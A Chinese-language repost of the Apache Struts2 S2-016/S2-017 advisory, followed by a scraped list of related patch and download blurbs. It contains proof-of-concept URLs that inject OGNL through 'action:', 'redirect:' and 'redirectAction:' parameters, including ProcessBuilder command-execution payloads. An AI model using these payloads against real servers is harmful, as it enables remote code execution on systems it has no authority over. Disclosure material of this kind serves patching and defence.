原链:http://zone.wooyun.org/content/5159
POC来自官方:
http://struts.apache.org/release/2.3.x/docs/s2-016.html
http://struts.apache.org/release/2.3.x/docs/s2-017.html
这是一个代码执行漏洞,利用java代码来执行系统命令。
影响版本:Struts 2.0.0 – Struts 2.3.15
漏洞说明:
The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with “action:” or “redirect:”, followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms.
In Struts 2 before 2.3.15.1 the information following “action:”, “redirect:” or “redirectAction:” is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
测试POC:
In the Struts Blank App, open following URLs.
Simple Expression – the parameter names are evaluated as OGNL.
http://www.8090sec.com/struts2-blank/example/X.action?action:%25{3*4}
http://www.8090sec.com/struts2-showcase/employee/save.action?redirect:%25{3*4}
Command Execution
http://www.8090sec.com/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{‘command’,'goes’,'here’})).start()}
http://www.8090sec.com/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{‘command’,'goes’,'here’})).start()}
http://www.8090sec.com/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{‘command’,'goes’,'here’})).start()}
解决方法:
DefaultActionMapper was changed to sanitize “action:”-prefixed information properly. The features involved with “redirect:”/”redirectAction:”-prefixed parameters were completely dropped – see also S2-017.
官方说明:http://struts.apache.org/release/2.3.x/docs/s2-016.html
相关推荐
-- 为修复struts2 s2-016、s2-017漏洞,重写DefaultActionMapper --> <bean type="org.apache.struts2.dispatcher.mapper.ActionMapper" name="myDefaultActionMapper" class=...
struts2 最新漏洞 S2-016、S2-017修补方案 .docx
struts2.0反序列化漏洞,存在s2-005、s2-016、s2-016_3、s2-017等漏洞解决方案,已升级可用
logging-1.0.4.jar<br>commons-validator-1.3.1.jar<br>jstl-1.0.2.jar<br>oro-2.0.8.jar<br>standard-1.0.2.jar<br>struts-core-1.3.8.jar<br>struts-el-1.3.8.jar<br>struts-extras-1.3.8.jar<br>struts-faces-...
对Struts s2-016 s2-017的官方修复建议是升级struts, 但对正在运行的系统,许多依赖包会导致运行出错, 直接更改代码是更快的选择. 本补丁是针对 struts2-core-2.0.11.jar 的修改, 把文件中 bin下的文件直接copy到 web...
1. 导入的包<br><br>l struts2的五个基础包:commons-logging-1.1.jar;...<br><br>xwork-2.0.0.jar.<br><br>l spring的核心包:spring.jar<br><br>l 二者集成开发所需的包:struts-spring-plugin-2.0.6.jar<br>
Struts2 (S2-016/S2-017)高危漏洞修复文件
0、这是一个简单、暴力、治根的补漏方法 1、struts2漏洞s2-045,不升级jar版本的修补方法,已验证
<br> ------------------------------------------------<br> 实例说明:<br><br> 将<br><br> “struts2-mailreader-2.0.9.war”<br><br> 改为<br><br> “struts2-mailreader-2.0.9.rar”<br><br> 使用解压工具解压-...
本工具可以详细测试S2-016/017漏洞的资源,有助于您更深层的了解struts!
<br> ------------------------------------------------<br> 实例说明:<br><br> 将<br><br> “struts2-mailreader-2.0.9.war”<br><br> 改为<br><br> “struts2-mailreader-2.0.9.rar”<br><br> 使用解压工具解压-...
<br> ------------------------------------------------<br> 实例说明:<br><br> 将<br><br> “struts2-mailreader-2.0.9.war”<br><br> 改为<br><br> “struts2-mailreader-2.0.9.rar”<br><br> 使用解压工具解压-...
<filter-name>struts-cleanup</filter-name> <filter-class> org.apache.struts2.dispatcher.ActionContextCleanUp </filter-class> </filter> <filter-mapping> <filter-name>struts-cleanup</filter-name> ...
struts-2.3.32-all (含struts2-core-2.3.32.jar) 修补S2-045漏洞所有核心jar包及依赖的jar
struts2演示<br><br>1./helloworld - helloworld<br>2./spring - 与spring整合<br>3./coc - 惯例优先配置,零配置文件 - codebehind不支持redirect,chain等操作,需要自己写jsp跳转<br>4./crud - CRUD,Create Read...
<s:checkbox></s:checkbox>-----复选框 <s:checkboxlist list=""></s:checkboxlist>-----多选框 <s:combobox list=""></s:combobox>-----下拉框 <s:component></s:component>-----图像符号 D: <s:date/>-----获取...
2.如果您使用基于Jakarta插件,请升级到Apache Struts 2.3.32或2.5.10.1版本。(强烈推荐) 3.升级到2.3.32所用到的jar包: freemarker-2.3.22.jar ognl-3.0.19.jar struts2-convention-plugin-2.3.32.jar struts2-...
<filter-name>struts-cleanup</filter-name> <filter-class>org.apache.struts2.dispatcher.ActionContextCleanUp</filter-class> filter> <filter> <filter-name>sitemesh</filter-name> <filter-class>...
<filter-name>struts2</filter-name> <!-- 过滤器的名字 --> <filter-class>org.apache.struts2.dispatcher.filter.StrutsPrepareAndExecuteFilter</filter-class> <!-- 引用个具体类文件 --> </...
Struts2远程代码执行漏洞分析(S2-013)1